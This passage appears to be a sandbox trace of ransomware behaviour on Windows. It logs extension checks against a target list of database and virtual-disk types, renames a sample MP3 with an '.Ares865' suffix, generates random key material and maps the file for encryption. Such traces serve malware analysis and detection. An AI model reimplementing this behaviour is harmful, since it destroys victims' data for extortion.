returned 4 [0054.679] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2=".ini") returned 1 [0054.679] lstrlenW (lpString=".sys") returned 4 [0054.679] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2=".sys") returned 1 [0054.679] lstrlenW (lpString="Sleep Away.mp3") returned 14 [0054.679] lstrlenW (lpString="bak") returned 3 [0054.679] lstrcmpiW (lpString1="mp3", lpString2="bak") returned 1 [0054.679] lstrlenW (lpString="ba_") returned 3 [0054.679] lstrcmpiW (lpString1="mp3", lpString2="ba_") returned 1 [0054.679] lstrlenW (lpString="dbb") returned 3 [0054.679] lstrcmpiW (lpString1="mp3", lpString2="dbb") returned 1 [0054.679] lstrlenW (lpString="vmdk") returned 4 [0054.679] lstrcmpiW (lpString1=".mp3", lpString2="vmdk") returned -1 [0054.679] lstrlenW (lpString="rar") returned 3 [0054.679] lstrcmpiW (lpString1="mp3", lpString2="rar") returned -1 [0054.679] lstrlenW (lpString="zip") returned 3 [0054.679] lstrcmpiW (lpString1="mp3", lpString2="zip") returned -1 [0054.680] lstrlenW (lpString="tgz") returned 3 [0054.680] lstrcmpiW (lpString1="mp3", lpString2="tgz") returned -1 [0054.680] lstrlenW (lpString="vbox") returned 4 [0054.680] lstrcmpiW (lpString1=".mp3", lpString2="vbox") returned -1 [0054.680] lstrlenW (lpString="vdi") returned 3 [0054.680] lstrcmpiW (lpString1="mp3", lpString2="vdi") returned -1 [0054.680] lstrlenW (lpString="vhd") returned 3 [0054.680] lstrcmpiW (lpString1="mp3", lpString2="vhd") returned -1 [0054.680] lstrlenW (lpString="vhdx") returned 4 [0054.680] lstrcmpiW (lpString1=".mp3", lpString2="vhdx") returned -1 [0054.680] lstrlenW (lpString="avhd") returned 4 [0054.680] lstrcmpiW (lpString1=".mp3", lpString2="avhd") returned -1 [0054.680] lstrlenW (lpString="db") returned 2 [0054.680] lstrcmpiW (lpString1="p3", lpString2="db") returned 1 [0054.680] lstrlenW (lpString="db2") returned 3 [0054.680] lstrcmpiW (lpString1="mp3", lpString2="db2") returned 1 [0054.680] lstrlenW (lpString="db3") returned 3 [0054.680] lstrcmpiW (lpString1="mp3", lpString2="db3") returned 1 [0054.680] lstrlenW (lpString="dbf") returned 3 [0054.680] lstrcmpiW (lpString1="mp3", lpString2="dbf") returned 1 [0054.680] lstrlenW (lpString="mdf") returned 3 [0054.680] lstrcmpiW (lpString1="mp3", lpString2="mdf") returned 1 [0054.680] lstrlenW (lpString="mdb") returned 3 [0054.680] lstrcmpiW (lpString1="mp3", lpString2="mdb") returned 1 [0054.680] lstrlenW (lpString="sql") returned 3 [0054.680] lstrcmpiW (lpString1="mp3", lpString2="sql") returned -1 [0054.680] lstrlenW (lpString="sqlite") returned 6 [0054.680] lstrcmpiW (lpString1="ay.mp3", lpString2="sqlite") returned -1 [0054.680] lstrlenW (lpString="sqlite3") returned 7 [0054.680] lstrcmpiW (lpString1="way.mp3", lpString2="sqlite3") returned 1 [0054.680] lstrlenW (lpString="sqlitedb") returned 8 [0054.680] lstrcmpiW (lpString1="Away.mp3", lpString2="sqlitedb") returned -1 [0054.680] lstrlenW (lpString="xml") returned 3 [0054.680] lstrcmpiW (lpString1="mp3", lpString2="xml") returned -1 [0054.680] lstrlenW (lpString="$er") returned 3 [0054.680] lstrcmpiW (lpString1="mp3", lpString2="$er") returned 1 [0054.680] lstrlenW (lpString="4dd") returned 3 [0054.680] lstrcmpiW (lpString1="mp3", lpString2="4dd") returned 1 [0054.680] lstrlenW (lpString="4dl") returned 3 [0054.681] lstrcmpiW (lpString1="mp3", lpString2="4dl") returned 1 [0054.681] lstrlenW (lpString="^^^") returned 3 [0054.681] lstrcmpiW (lpString1="mp3", lpString2="^^^") returned 1 [0054.681] lstrlenW (lpString="abs") returned 3 [0054.681] lstrcmpiW (lpString1="mp3", lpString2="abs") returned 1 [0054.681] lstrlenW (lpString="abx") returned 3 [0054.681] lstrcmpiW (lpString1="mp3", lpString2="abx") returned 1 [0054.681] lstrlenW (lpString="accdb") returned 5 [0054.681] lstrcmpiW (lpString1="y.mp3", lpString2="accdb") returned 1 [0054.681] lstrlenW (lpString="accdc") returned 5 [0054.681] lstrcmpiW (lpString1="y.mp3", lpString2="accdc") returned 1 [0054.681] lstrlenW (lpString="accde") returned 5 [0054.681] lstrcmpiW (lpString1="y.mp3", lpString2="accde") returned 1 [0054.681] lstrlenW (lpString="accdr") returned 5 [0054.681] lstrcmpiW (lpString1="y.mp3", lpString2="accdr") returned 1 [0054.681] lstrlenW (lpString="accdt") returned 5 [0054.681] lstrcmpiW (lpString1="y.mp3", lpString2="accdt") returned 1 [0054.681] lstrlenW (lpString="accdw") returned 5 [0054.681] lstrcmpiW (lpString1="y.mp3", lpString2="accdw") returned 1 [0054.681] lstrlenW (lpString="accft") returned 5 [0054.681] lstrcmpiW (lpString1="y.mp3", lpString2="accft") returned 1 [0054.681] lstrlenW (lpString="adb") returned 3 [0054.681] lstrcmpiW (lpString1="mp3", lpString2="adb") returned 1 [0054.681] lstrlenW (lpString="adb") returned 3 [0054.681] lstrcmpiW (lpString1="mp3", lpString2="adb") returned 1 [0054.681] lstrlenW (lpString="ade") returned 3 [0054.681] lstrcmpiW (lpString1="mp3", lpString2="ade") returned 1 [0054.681] lstrlenW (lpString="adf") returned 3 [0054.681] lstrcmpiW (lpString1="mp3", lpString2="adf") returned 1 [0054.681] lstrlenW (lpString="adn") returned 3 [0054.681] lstrcmpiW (lpString1="mp3", lpString2="adn") returned 1 [0054.681] lstrlenW (lpString="adp") returned 3 [0054.681] lstrcmpiW (lpString1="mp3", lpString2="adp") returned 1 [0054.681] lstrlenW (lpString="alf") returned 3 [0054.681] lstrcmpiW (lpString1="mp3", lpString2="alf") returned 1 [0054.681] lstrlenW (lpString="ask") returned 3 [0054.681] lstrcmpiW (lpString1="mp3", lpString2="ask") returned 1 [0054.681] lstrlenW (lpString="btr") returned 3 [0054.682] lstrcmpiW (lpString1="mp3", lpString2="btr") returned 1 [0054.682] lstrlenW (lpString="cat") returned 3 [0054.682] lstrcmpiW (lpString1="mp3", lpString2="cat") returned 1 [0054.682] lstrlenW (lpString="cdb") returned 3 [0054.682] lstrcmpiW (lpString1="mp3", lpString2="cdb") returned 1 [0054.682] lstrlenW (lpString="ckp") returned 3 [0054.682] lstrcmpiW (lpString1="mp3", lpString2="ckp") returned 1 [0054.682] lstrlenW (lpString="cma") returned 3 [0054.682] lstrcmpiW (lpString1="mp3", lpString2="cma") returned 1 [0054.682] lstrlenW (lpString="cpd") returned 3 [0054.682] lstrcmpiW (lpString1="mp3", lpString2="cpd") returned 1 [0054.682] lstrlenW (lpString="dacpac") returned 6 [0054.682] lstrcmpiW (lpString1="ay.mp3", lpString2="dacpac") returned -1 [0054.682] lstrlenW (lpString="dad") returned 3 [0054.682] lstrcmpiW (lpString1="mp3", lpString2="dad") returned 1 [0054.682] lstrlenW (lpString="dadiagrams") returned 10 [0054.682] lstrcmpiW (lpString1="p Away.mp3", lpString2="dadiagrams") returned 1 [0054.682] lstrlenW (lpString="daschema") returned 8 [0054.682] lstrcmpiW (lpString1="Away.mp3", lpString2="daschema") returned -1 [0054.682] lstrlenW (lpString="db-journal") returned 10 [0054.682] lstrcmpiW (lpString1="p Away.mp3", lpString2="db-journal") returned 1 [0054.682] lstrlenW (lpString="db-shm") returned 6 [0054.682] lstrcmpiW (lpString1="ay.mp3", lpString2="db-shm") returned -1 [0054.682] lstrlenW (lpString="db-wal") returned 6 [0054.682] lstrcmpiW (lpString1="ay.mp3", lpString2="db-wal") returned -1 [0054.682] lstrlenW (lpString="dbc") returned 3 [0054.682] lstrcmpiW (lpString1="mp3", lpString2="dbc") returned 1 [0054.682] lstrlenW (lpString="dbs") returned 3 [0054.682] lstrcmpiW (lpString1="mp3", lpString2="dbs") returned 1 [0054.682] lstrlenW (lpString="dbt") returned 3 [0054.682] lstrcmpiW (lpString1="mp3", lpString2="dbt") returned 1 [0054.682] lstrlenW (lpString="dbv") returned 3 [0054.682] lstrcmpiW (lpString1="mp3", lpString2="dbv") returned 1 [0054.682] lstrlenW (lpString="dbx") returned 3 [0054.682] lstrcmpiW (lpString1="mp3", lpString2="dbx") returned 1 [0054.682] lstrlenW (lpString="dcb") returned 3 [0054.683] lstrcmpiW (lpString1="mp3", lpString2="dcb") returned 1 [0054.683] lstrlenW (lpString="dct") returned 3 [0054.683] lstrcmpiW (lpString1="mp3", lpString2="dct") returned 1 [0054.683] lstrlenW (lpString="dcx") returned 3 [0054.683] lstrcmpiW (lpString1="mp3", lpString2="dcx") returned 1 [0054.683] lstrlenW (lpString="ddl") returned 3 [0054.683] lstrcmpiW (lpString1="mp3", lpString2="ddl") returned 1 [0054.683] lstrlenW (lpString="dlis") returned 4 [0054.683] lstrcmpiW (lpString1=".mp3", lpString2="dlis") returned -1 [0054.683] lstrlenW (lpString="dp1") returned 3 [0054.683] lstrcmpiW (lpString1="mp3", lpString2="dp1") returned 1 [0054.683] lstrlenW (lpString="dqy") returned 3 [0054.683] lstrcmpiW (lpString1="mp3", lpString2="dqy") returned 1 [0054.683] lstrlenW (lpString="dsk") returned 3 [0054.683] lstrcmpiW (lpString1="mp3", lpString2="dsk") returned 1 [0054.683] lstrlenW (lpString="dsn") returned 3 [0054.683] lstrcmpiW (lpString1="mp3", lpString2="dsn") returned 1 [0054.683] lstrlenW (lpString="dtsx") returned 4 [0054.683] lstrcmpiW (lpString1=".mp3", lpString2="dtsx") returned -1 [0054.683] lstrlenW (lpString="dxl") returned 3 [0054.683] lstrcmpiW (lpString1="mp3", lpString2="dxl") returned 1 [0054.683] lstrlenW (lpString="eco") returned 3 [0054.683] lstrcmpiW (lpString1="mp3", lpString2="eco") returned 1 [0054.683] lstrlenW (lpString="ecx") returned 3 [0054.683] lstrcmpiW (lpString1="mp3", lpString2="ecx") returned 1 [0054.683] lstrlenW (lpString="edb") returned 3 [0054.683] lstrcmpiW (lpString1="mp3", lpString2="edb") returned 1 [0054.683] lstrlenW (lpString="epim") returned 4 [0054.683] lstrcmpiW (lpString1=".mp3", lpString2="epim") returned -1 [0054.683] lstrlenW (lpString="fcd") returned 3 [0054.683] lstrcmpiW (lpString1="mp3", lpString2="fcd") returned 1 [0054.683] lstrlenW (lpString="fdb") returned 3 [0054.683] lstrcmpiW (lpString1="mp3", lpString2="fdb") returned 1 [0054.683] lstrlenW (lpString="fic") returned 3 [0054.683] lstrcmpiW (lpString1="mp3", lpString2="fic") returned 1 [0054.683] lstrlenW (lpString="flexolibrary") returned 12 [0054.683] lstrcmpiW (lpString1="eep Away.mp3", lpString2="flexolibrary") returned -1 [0054.683] lstrlenW (lpString="fm5") returned 3 [0054.683] lstrcmpiW (lpString1="mp3", lpString2="fm5") returned 1 [0054.684] lstrlenW (lpString="fmp") returned 3 [0054.684] lstrcmpiW (lpString1="mp3", lpString2="fmp") returned 1 [0054.684] lstrlenW (lpString="fmp12") returned 5 [0054.684] lstrcmpiW (lpString1="y.mp3", lpString2="fmp12") returned 1 [0054.684] lstrlenW (lpString="fmpsl") returned 5 [0054.684] lstrcmpiW (lpString1="y.mp3", lpString2="fmpsl") returned 1 [0054.684] lstrlenW (lpString="fol") returned 3 [0054.684] lstrcmpiW (lpString1="mp3", lpString2="fol") returned 1 [0054.684] lstrlenW (lpString="fp3") returned 3 [0054.684] lstrcmpiW (lpString1="mp3", lpString2="fp3") returned 1 [0054.684] lstrlenW (lpString="fp4") returned 3 [0054.684] lstrcmpiW (lpString1="mp3", lpString2="fp4") returned 1 [0054.684] lstrlenW (lpString="fp5") returned 3 [0054.684] lstrcmpiW (lpString1="mp3", lpString2="fp5") returned 1 [0054.684] lstrlenW (lpString="fp7") returned 3 [0054.684] lstrcmpiW (lpString1="mp3", lpString2="fp7") returned 1 [0054.684] lstrlenW (lpString="fpt") returned 3 [0054.684] lstrcmpiW (lpString1="mp3", lpString2="fpt") returned 1 [0054.684] lstrlenW (lpString="frm") returned 3 [0054.684] lstrcmpiW (lpString1="mp3", lpString2="frm") returned 1 [0054.684] lstrlenW (lpString="gdb") returned 3 [0054.684] lstrcmpiW (lpString1="mp3", lpString2="gdb") returned 1 [0054.684] lstrlenW (lpString="gdb") returned 3 [0054.684] lstrcmpiW (lpString1="mp3", lpString2="gdb") returned 1 [0054.684] lstrlenW (lpString="grdb") returned 4 [0054.684] lstrcmpiW (lpString1=".mp3", lpString2="grdb") returned -1 [0054.684] lstrlenW (lpString="gwi") returned 3 [0054.684] lstrcmpiW (lpString1="mp3", lpString2="gwi") returned 1 [0054.684] lstrlenW (lpString="hdb") returned 3 [0054.684] lstrcmpiW (lpString1="mp3", lpString2="hdb") returned 1 [0054.684] lstrlenW (lpString="his") returned 3 [0054.684] lstrcmpiW (lpString1="mp3", lpString2="his") returned 1 [0054.684] lstrlenW (lpString="ib") returned 2 [0054.684] lstrcmpiW (lpString1="p3", lpString2="ib") returned 1 [0054.684] lstrlenW (lpString="idb") returned 3 [0054.684] lstrcmpiW (lpString1="mp3", lpString2="idb") returned 1 [0054.684] lstrlenW (lpString="ihx") returned 3 [0054.684] lstrcmpiW (lpString1="mp3", lpString2="ihx") returned 1 [0054.685] lstrlenW (lpString="itdb") returned 4 [0054.685] lstrcmpiW (lpString1=".mp3", lpString2="itdb") returned -1 [0054.685] lstrlenW (lpString="itw") returned 3 [0054.685] lstrcmpiW (lpString1="mp3", lpString2="itw") returned 1 [0054.685] lstrlenW (lpString="jet") returned 3 [0054.685] lstrcmpiW (lpString1="mp3", lpString2="jet") returned 1 [0054.685] lstrlenW (lpString="jtx") returned 3 [0054.685] lstrcmpiW (lpString1="mp3", lpString2="jtx") returned 1 [0054.685] lstrlenW (lpString="kdb") returned 3 [0054.685] lstrcmpiW (lpString1="mp3", lpString2="kdb") returned 1 [0054.685] lstrlenW (lpString="kexi") returned 4 [0054.685] lstrcmpiW (lpString1=".mp3", lpString2="kexi") returned -1 [0054.685] lstrlenW (lpString="kexic") returned 5 [0054.685] lstrcmpiW (lpString1="y.mp3", lpString2="kexic") returned 1 [0054.685] lstrlenW (lpString="kexis") returned 5 [0054.685] lstrcmpiW (lpString1="y.mp3", lpString2="kexis") returned 1 [0054.685] lstrlenW (lpString="lgc") returned 3 [0054.685] lstrcmpiW (lpString1="mp3", lpString2="lgc") returned 1 [0054.685] lstrlenW (lpString="lwx") returned 3 [0054.685] lstrcmpiW (lpString1="mp3", lpString2="lwx") returned 1 [0054.685] lstrlenW (lpString="maf") returned 3 [0054.685] lstrcmpiW (lpString1="mp3", lpString2="maf") returned 1 [0054.685] lstrlenW (lpString="maq") returned 3 [0054.685] lstrcmpiW (lpString1="mp3", lpString2="maq") returned 1 [0054.685] lstrlenW (lpString="mar") returned 3 [0054.685] lstrcmpiW (lpString1="mp3", lpString2="mar") returned 1 [0054.685] lstrlenW (lpString="marshal") returned 7 [0054.685] lstrcmpiW (lpString1="way.mp3", lpString2="marshal") returned 1 [0054.685] lstrlenW (lpString="mas") returned 3 [0054.685] lstrcmpiW (lpString1="mp3", lpString2="mas") returned 1 [0054.685] lstrlenW (lpString="mav") returned 3 [0054.685] lstrcmpiW (lpString1="mp3", lpString2="mav") returned 1 [0054.685] lstrlenW (lpString="maw") returned 3 [0054.685] lstrcmpiW (lpString1="mp3", lpString2="maw") returned 1 [0054.685] lstrlenW (lpString="mdbhtml") returned 7 [0054.685] lstrcmpiW (lpString1="way.mp3", lpString2="mdbhtml") returned 1 [0054.685] lstrlenW (lpString="mdn") returned 3 [0054.685] lstrcmpiW (lpString1="mp3", lpString2="mdn") returned 1 [0054.685] lstrlenW (lpString="mdt") returned 3 [0054.686] lstrcmpiW (lpString1="mp3", lpString2="mdt") returned 1 [0054.686] lstrlenW (lpString="mfd") returned 3 [0054.686] lstrcmpiW (lpString1="mp3", lpString2="mfd") returned 1 [0054.686] lstrlenW (lpString="mpd") returned 3 [0054.686] lstrcmpiW (lpString1="mp3", lpString2="mpd") returned -1 [0054.686] lstrlenW (lpString="mrg") returned 3 [0054.686] lstrcmpiW (lpString1="mp3", lpString2="mrg") returned -1 [0054.686] lstrlenW (lpString="mud") returned 3 [0054.686] lstrcmpiW (lpString1="mp3", lpString2="mud") returned -1 [0054.686] lstrlenW (lpString="mwb") returned 3 [0054.686] lstrcmpiW (lpString1="mp3", lpString2="mwb") returned -1 [0054.686] lstrlenW (lpString="myd") returned 3 [0054.686] lstrcmpiW (lpString1="mp3", lpString2="myd") returned -1 [0054.686] lstrlenW (lpString="ndf") returned 3 [0054.686] lstrcmpiW (lpString1="mp3", lpString2="ndf") returned -1 [0054.686] lstrlenW (lpString="nnt") returned 3 [0054.686] lstrcmpiW (lpString1="mp3", lpString2="nnt") returned -1 [0054.686] lstrlenW (lpString="nrmlib") returned 6 [0054.686] lstrcmpiW (lpString1="ay.mp3", lpString2="nrmlib") returned -1 [0054.686] lstrlenW (lpString="ns2") returned 3 [0054.686] lstrcmpiW (lpString1="mp3", lpString2="ns2") returned -1 [0054.686] lstrlenW (lpString="ns3") returned 3 [0054.686] lstrcmpiW (lpString1="mp3", lpString2="ns3") returned -1 [0054.686] lstrlenW (lpString="ns4") returned 3 [0054.686] lstrcmpiW (lpString1="mp3", lpString2="ns4") returned -1 [0054.686] lstrlenW (lpString="nsf") returned 3 [0054.686] lstrcmpiW (lpString1="mp3", lpString2="nsf") returned -1 [0054.686] lstrlenW (lpString="nv") returned 2 [0054.686] lstrcmpiW (lpString1="p3", lpString2="nv") returned 1 [0054.686] lstrlenW (lpString="nv2") returned 3 [0054.686] lstrcmpiW (lpString1="mp3", lpString2="nv2") returned -1 [0054.686] lstrlenW (lpString="nwdb") returned 4 [0054.686] lstrcmpiW (lpString1=".mp3", lpString2="nwdb") returned -1 [0054.686] lstrlenW (lpString="nyf") returned 3 [0054.686] lstrcmpiW (lpString1="mp3", lpString2="nyf") returned -1 [0054.686] lstrlenW (lpString="odb") returned 3 [0054.686] lstrcmpiW (lpString1="mp3", lpString2="odb") returned -1 [0054.687] lstrlenW (lpString="odb") returned 3 [0054.687] lstrcmpiW (lpString1="mp3", lpString2="odb") returned -1 [0054.687] lstrlenW (lpString="oqy") returned 3 [0054.687] lstrcmpiW (lpString1="mp3", lpString2="oqy") returned -1 [0054.687] lstrlenW (lpString="ora") returned 3 [0054.687] lstrcmpiW (lpString1="mp3", lpString2="ora") returned -1 [0054.687] lstrlenW (lpString="orx") returned 3 [0054.687] lstrcmpiW (lpString1="mp3", lpString2="orx") returned -1 [0054.687] lstrlenW (lpString="owc") returned 3 [0054.687] lstrcmpiW (lpString1="mp3", lpString2="owc") returned -1 [0054.687] lstrlenW (lpString="p96") returned 3 [0054.687] lstrcmpiW (lpString1="mp3", lpString2="p96") returned -1 [0054.687] lstrlenW (lpString="p97") returned 3 [0054.687] lstrcmpiW (lpString1="mp3", lpString2="p97") returned -1 [0054.687] lstrlenW (lpString="pan") returned 3 [0054.687] lstrcmpiW (lpString1="mp3", lpString2="pan") returned -1 [0054.687] lstrlenW (lpString="pdb") returned 3 [0054.687] lstrcmpiW (lpString1="mp3", lpString2="pdb") returned -1 [0054.687] lstrlenW (lpString="pdm") returned 3 [0054.687] lstrcmpiW (lpString1="mp3", lpString2="pdm") returned -1 [0054.687] lstrlenW (lpString="pnz") returned 3 [0054.687] lstrcmpiW (lpString1="mp3", lpString2="pnz") returned -1 [0054.687] lstrlenW (lpString="qry") returned 3 [0054.687] lstrcmpiW (lpString1="mp3", lpString2="qry") returned -1 [0054.687] lstrlenW (lpString="qvd") returned 3 [0054.687] lstrcmpiW (lpString1="mp3", lpString2="qvd") returned -1 [0054.687] lstrlenW (lpString="rbf") returned 3 [0054.687] lstrcmpiW (lpString1="mp3", lpString2="rbf") returned -1 [0054.687] lstrlenW (lpString="rctd") returned 4 [0054.687] lstrcmpiW (lpString1=".mp3", lpString2="rctd") returned -1 [0054.687] lstrlenW (lpString="rod") returned 3 [0054.687] lstrcmpiW (lpString1="mp3", lpString2="rod") returned -1 [0054.687] lstrlenW (lpString="rodx") returned 4 [0054.687] lstrcmpiW (lpString1=".mp3", lpString2="rodx") returned -1 [0054.687] lstrlenW (lpString="rpd") returned 3 [0054.688] lstrcmpiW (lpString1="mp3", lpString2="rpd") returned -1 [0054.688] lstrlenW (lpString="rsd") returned 3 [0054.688] lstrcmpiW (lpString1="mp3", lpString2="rsd") returned -1 [0054.688] lstrlenW (lpString="sas7bdat") returned 8 [0054.688] lstrcmpiW (lpString1="Away.mp3", lpString2="sas7bdat") returned -1 [0054.688] lstrlenW (lpString="sbf") returned 3 [0054.688] lstrcmpiW (lpString1="mp3", lpString2="sbf") returned -1 [0054.688] lstrlenW (lpString="scx") returned 3 [0054.688] lstrcmpiW (lpString1="mp3", lpString2="scx") returned -1 [0054.688] lstrlenW (lpString="sdb") returned 3 [0054.688] lstrcmpiW (lpString1="mp3", lpString2="sdb") returned -1 [0054.688] lstrlenW (lpString="sdc") returned 3 [0054.688] lstrcmpiW (lpString1="mp3", lpString2="sdc") returned -1 [0054.688] lstrlenW (lpString="sdf") returned 3 [0054.688] lstrcmpiW (lpString1="mp3", lpString2="sdf") returned -1 [0054.688] lstrlenW (lpString="sis") returned 3 [0054.688] lstrcmpiW (lpString1="mp3", lpString2="sis") returned -1 [0054.688] lstrlenW (lpString="spq") returned 3 [0054.688] lstrcmpiW (lpString1="mp3", lpString2="spq") returned -1 [0054.688] lstrlenW (lpString="te") returned 2 [0054.688] lstrcmpiW (lpString1="p3", lpString2="te") returned -1 [0054.688] lstrlenW (lpString="teacher") returned 7 [0054.688] lstrcmpiW (lpString1="way.mp3", lpString2="teacher") returned 1 [0054.688] lstrlenW (lpString="tmd") returned 3 [0054.688] lstrcmpiW (lpString1="mp3", lpString2="tmd") returned -1 [0054.688] lstrlenW (lpString="tps") returned 3 [0054.688] lstrcmpiW (lpString1="mp3", lpString2="tps") returned -1 [0054.688] lstrlenW (lpString="trc") returned 3 [0054.688] lstrcmpiW (lpString1="mp3", lpString2="trc") returned -1 [0054.688] lstrlenW (lpString="trc") returned 3 [0054.688] lstrcmpiW (lpString1="mp3", lpString2="trc") returned -1 [0054.688] lstrlenW (lpString="trm") returned 3 [0054.688] lstrcmpiW (lpString1="mp3", lpString2="trm") returned -1 [0054.689] lstrlenW (lpString="udb") returned 3 [0054.689] lstrcmpiW (lpString1="mp3", lpString2="udb") returned -1 [0054.689] lstrlenW (lpString="udl") returned 3 [0054.689] lstrcmpiW (lpString1="mp3", lpString2="udl") returned -1 [0054.689] lstrlenW (lpString="usr") returned 3 [0054.689] lstrcmpiW (lpString1="mp3", lpString2="usr") returned -1 [0054.689] lstrlenW (lpString="v12") returned 3 [0054.689] lstrcmpiW (lpString1="mp3", lpString2="v12") returned -1 [0054.689] lstrlenW (lpString="vis") returned 3 [0054.689] lstrcmpiW (lpString1="mp3", lpString2="vis") returned -1 [0054.689] lstrlenW (lpString="vpd") returned 3 [0054.689] lstrcmpiW (lpString1="mp3", lpString2="vpd") returned -1 [0054.689] lstrlenW (lpString="vvv") returned 3 [0054.689] lstrcmpiW (lpString1="mp3", lpString2="vvv") returned -1 [0054.689] lstrlenW (lpString="wdb") returned 3 [0054.689] lstrcmpiW (lpString1="mp3", lpString2="wdb") returned -1 [0054.689] lstrlenW (lpString="wmdb") returned 4 [0054.689] lstrcmpiW (lpString1=".mp3", lpString2="wmdb") returned -1 [0054.689] lstrlenW (lpString="wrk") returned 3 [0054.689] lstrcmpiW (lpString1="mp3", lpString2="wrk") returned -1 [0054.689] lstrlenW (lpString="xdb") returned 3 [0054.689] lstrcmpiW (lpString1="mp3", lpString2="xdb") returned -1 [0054.689] lstrlenW (lpString="xld") returned 3 [0054.689] lstrcmpiW (lpString1="mp3", lpString2="xld") returned -1 [0054.689] lstrlenW (lpString="xmlff") returned 5 [0054.689] lstrcmpiW (lpString1="y.mp3", lpString2="xmlff") returned 1 [0054.689] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.Ares865") returned 57 [0054.689] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), lpNewFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.Ares865" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3.ares865"), dwFlags=0x1) returned 1 [0054.690] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.Ares865" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0054.690] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4842585) returned 1 [0054.690] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0054.690] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d36d8 [0054.690] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0054.691] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0054.692] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0054.692] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0054.692] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x49e760, lpName=0x0) returned 0x12c [0054.694] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x400000, dwNumberOfBytesToMap=0x9e760) returned 0xb80000 [0056.185] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0056.186] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0056.186] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0056.186] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3750 [0056.186] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3750 | out: hHeap=0x2b0000) returned 1 [0056.186] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0056.186] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0056.186] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0056.187] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0056.187] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0056.187] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0056.187] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0056.187] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0056.187] UnmapViewOfFile (lpBaseAddress=0xb80000) returned 1 [0056.193] CloseHandle (hObject=0x12c) returned 1 [0056.193] CloseHandle (hObject=0x15c) returned 1 [0056.193] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d36d8 | out: hHeap=0x2b0000) returned 1 [0056.193] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0056.193] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0056.207] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be38a97, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x49e459, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sleep Away.mp3", cAlternateFileName="SLEEPA~1.MP3")) returned 0 [0056.208] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0056.208] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c30 [0056.208] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Public\\Libraries", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0056.208] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cce28 | out: hHeap=0x2b0000) returned 1 [0056.208] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: 